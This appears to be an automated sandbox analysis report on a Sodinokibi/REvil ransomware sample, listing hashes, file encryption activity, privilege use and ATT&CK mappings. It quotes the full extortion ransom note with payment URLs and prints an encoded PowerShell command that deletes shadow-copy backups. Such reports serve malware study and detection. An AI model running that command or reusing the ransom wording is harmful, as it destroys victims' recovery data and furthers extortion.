sodinokibi | ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195

Analysis

max time kernel
133s
max time network
137s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-06-2024 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
Size

115KB
MD5

63a945da1a63a8e56e8220c4ccf7fd0c
SHA1

a99cf1a2426edeac97c789d0a4b7d38606d7aa45
SHA256

ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195
SHA512

34006d84587ea90e243ebe0dd6bde8bd502ed688001a412898cd4e4c16a5de5788a9fa4c53d3ea79e4307adaa74496e05b205bf9717ac833db976551b1a7c89c
SSDEEP

1536:ikB/Ih3+7QuoZVQgf5GV2jSzGpAyZ4ICS4AwnfxnuLdSbSmoNUExd9M4dgS:gFW7gSzKDin5nWhw4dgS

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Users\93z2w2j3-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 93z2w2j3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0846C4A22137B9D5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0846C4A22137B9D5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ceL4M+s0tdpXTe65H075vuwqhPHwOi6vDcRWgkTA7VP4cLdMTb+SKVOT4H6zjmkC BErU4pka6T6nA/ZHoucAwS9I6xaR8kttAt3P74eMte3OCpoqUUofybZFwYN0yI0u yQi8/zLSYkjNSy0ZjppYIqBxTNQsLIbIg9Gi9HrY2ykk28IHUFcRuHIBWGBvKcsZ Gbx23BFJ9VOfDya/yhafzfvePvmfJbCp7h01gCVnsVv7eENqU7X/Sh3/XFCfctBW Gz5NEigZdDS4pC5M33mQ89HD3/tK77s/CGLoFkJWGnM2MqXfLnAH5fyt2kfIci1k DkbvM1oW5oJeLdIePZC/N5Wal7P2VkRNh8s/SZo1o89b32h616vd4ckm7aoThSp9 juiBZm4NiqDtiDk5DVozJWQ38ZyeK4Es5UEwew7hG1teBXuMdAMYahkfLukc2YRK NJduezd7uAO/BZ9emMmCG5mSGdVtrQXmxIGYgreJ0SKW7HQ+Cr9pJwEQvn4QBvwH g2qzstcRU6eF/ASEoMbOUYrVUhIsMt2vDPw9/5E8D+XY65lRQV2dfi60TIfcsZCu AJPxNyXM7OWb2Oo7fjstMcQDSvDggyM92PB//EHZC29sAkvHYyBuUtXHfz4pEMnO 3rgjQzZg2IY3U1ncwT0StieV0F4ML3yKU7enTmtaoW2UIrlKOldtuLDoHr88hR7m P6u39jOZJhPRw1pIMULVfsH1jj/OvBiyPpW/cLTJ3KpRPAG87QBHu8O4UECZ33Ls 322lW/sIORfyJPh48w7HIqL163zQ4KUAphqE3TcpBz0CPtAa/sOXGUhdAtI4sGoX WtH2gOw3g5Zp+jJjf+6/h7wI3QU4QCFmHnr3NvUlVUf6WXCIso/2GWsu6UnmTORs APVlfUXT8bo4lpT7flGAoeiRdWh8EsI4J+BXbdAqFc31ZUBwXoWygX7ssHGBZTyM ivR10n34ovdZEBe2kzOr+E3T3Ru+IGiNviHmbLl5X6FgEMS+Ukk5Aia3kxbrK6o2 BcruwPX3gUFGnW4BVL3iBzvdFUOlrWH9tWKxN16Jg1Lq9OwF0iCN/BSXQhI0/1Zq l4JKW/exmwSE+6NUccG2+IfVrLPpYis/zWJlL8nWvsURJr1Bo00zhI0EwYzG3Xnr aHacZ8s2LuYj5KbeZE8Vtzw2qRphHFvePD5xfsGxKe5lt+QKoGlmIdRkbGW5Bwqu licWN6WQp62dROTqlkqgIhBIauseKcYjYyHa6YM22iWpk4OJc41bspX5o5lucN0d FcnEKr5xtiQQXVki8wbxXmjQ+9OEGW8vYmWVeVvfq8DIcmeZAGAwJ9Zg72Vk4i44 BsctSbJZeCKHjQWLCkcffa+GHHE9+3lWWpatwQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0846C4A22137B9D5

http://decryptor.cc/0846C4A22137B9D5

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\O:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\H:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Y:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\E:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\R:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\W:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\D:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\A:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\M:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\P:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\S:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\I:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\F:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Z:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\K:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Q:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\U:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\V:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\X:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\G:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\J:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\L:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\T:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\B:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\y0buebz0y4a4v.bmp"	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Drops file in Program Files directory 37 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\BackupExpand.mpg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\BackupLimit.wax	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\EnableInvoke.pptm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File created	\??\c:\program files\93z2w2j3-readme.txt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ConnectBlock.snd	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ConvertToStep.wps	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\MeasureRead.tiff	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\SelectComplete.ppt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\InitializeClear.pptm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\SplitUnprotect.ods	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UninstallMount.mpeg2	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File created	\??\c:\program files (x86)\93z2w2j3-readme.txt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ConnectBlock.ttf	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\DismountPop.aif	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\LimitSave.wdp	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\MeasureSearch.odt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\MoveUse.htm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\TestComplete.ADTS	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ExportHide.kix	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ResolveInstall.pptx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnprotectGrant.ttf	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\CheckpointSuspend.jtx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\InstallSelect.cfg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\OutSubmit.ADT	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\SelectCheckpoint.xml	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnprotectConvertTo.otf	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnpublishRedo.ADT	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\CheckpointExport.au3	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\FindCheckpoint.raw	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\MoveInvoke.jpeg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\PushStop.wdp	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UndoHide.jpeg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\BackupGet.3gp2	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ConvertFromBlock.cr2	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\DisableFind.xlsb	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ExpandSplit.mpg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnlockClear.dxf	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeBackupPrivilege	1388	vssvc.exe
Token: SeRestorePrivilege	1388	vssvc.exe
Token: SeAuditPrivilege	1388	vssvc.exe
Token: SeTakeOwnershipPrivilege	2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 4648	2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe	74
PID 2820 wrote to memory of 4648	2820	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe	74

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
"C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4648

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2732

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\93z2w2j3-readme.txt

Filesize
7KB

MD5
2ab808d861b1e618d6611ff8dce9bc71

SHA1
c9afb807887fc85a5128be2f75d4d3d676fece71

SHA256
bf04e4001e0f6afac785b833cf21ecccd480077094b372a8d8ec87a5f4291075

SHA512
f2d66a1ce7b5c839af09c19e1464dad22ef423f76caa4a61696d60e4eb76b355c42aa2cc855fc9376a4b9197f421570b5d0f7f6dc70027331d92ddee3a8723d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysidsrce.kjh.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/4648-3-0x00007FFD5EBC3000-0x00007FFD5EBC4000-memory.dmp

Filesize
4KB

Download
memory/4648-5-0x000001995A2A0000-0x000001995A2C2000-memory.dmp

Filesize
136KB

Download
memory/4648-8-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

Filesize
9.9MB

Download
memory/4648-9-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

Filesize
9.9MB

Download
memory/4648-10-0x000001995A450000-0x000001995A4C6000-memory.dmp

Filesize
472KB

Download
memory/4648-32-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

Filesize
9.9MB

Download